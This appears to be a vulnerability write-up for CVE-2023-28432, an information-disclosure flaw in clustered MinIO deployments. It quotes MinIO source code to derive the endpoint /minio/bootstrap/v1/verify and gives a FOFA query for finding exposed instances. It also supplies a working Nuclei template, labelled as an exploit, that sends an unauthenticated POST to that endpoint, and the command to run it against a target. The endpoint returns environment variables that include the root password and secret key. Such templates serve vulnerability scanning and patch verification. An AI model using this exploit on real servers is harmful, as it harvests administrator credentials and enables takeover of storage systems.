CVE-2023-28432

CVE-2023-28432 nuclei templates

Dec

Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

vuln info

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197// Verify - fetches system server config.func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) { if newObjectLayerFn() != nil { return nil } respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1) if err != nil { return } defer xhttp.DrainBody(respBody) recvCfg := ServerSystemConfig{} if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil { return err } return srcCfg.Diff(recvCfg) } # https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54const ( bootstrapRESTVersion       = "v1" bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap" bootstrapRESTPath          = bootstrapRESTPrefix + bootstrapRESTVersionPrefix)const ( bootstrapRESTMethodHealth = "/health" bootstrapRESTMethodVerify = "/verify")// To abstract a node over network.type bootstrapRESTServer struct{}// ServerSystemConfig - captures information about server configuration.type ServerSystemConfig struct { MinioEndpoints EndpointServerPools MinioEnv       map[string]string} # https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) { ctx := newContext(r, w, "VerifyHandler") if err := storageServerRequestValidate(r); err != nil { b.writeErrorResponse(w, err) return } cfg := getServerSystemCfg() logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg)) }// registerBootstrapRESTHandlers - register bootstrap rest router.func registerBootstrapRESTHandlers(router *mux.Router) { server := &bootstrapRESTServer{} subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter() subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc( httpTraceHdrs(server.HealthHandler)) subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc( httpTraceHdrs(server.VerifyHandler)) } # https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210// SlashSeparator - slash separator.const SlashSeparator = "/"https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138const ( minioReservedBucket              = "minio" minioReservedBucketPath          = SlashSeparator + minioReservedBucket minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparatorSlashSeparator = "/"minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /miniobootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/bootstrapRESTVersion       = "v1"bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1bootstrapRESTMethodVerify = "/verify"subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/final path:/minio/bootstrap/v1/verify/

fofa

app="minio"

EXP

id: CVE-2023-28432info:  name: Minio post policy request security bypass  author: Mr-xn  severity: high  description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.  reference:    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q    - https://github.com/minio/minio/pull/16853/files    - https://github.com/golang/vulndb/issues/1667    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N    cvss-score: 7.5    cve-id: CVE-2023-28432    cwe-id: CWE-200  tags: cve,cve2023,requests:  - raw:      - |+        POST /minio/bootstrap/v1/verify HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded    matchers-condition: and    matchers:      - type: word        part: body        words:          - '"MinioEndpoints"'      - type: word        part: header        words:          - 'Content-Type: text/plain'      - type: status        status:          - 200

nuclei

nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port

reference:

• https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

• https://github.com/minio/minio/pull/16853/files

• golang/vulndb#1667

• https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json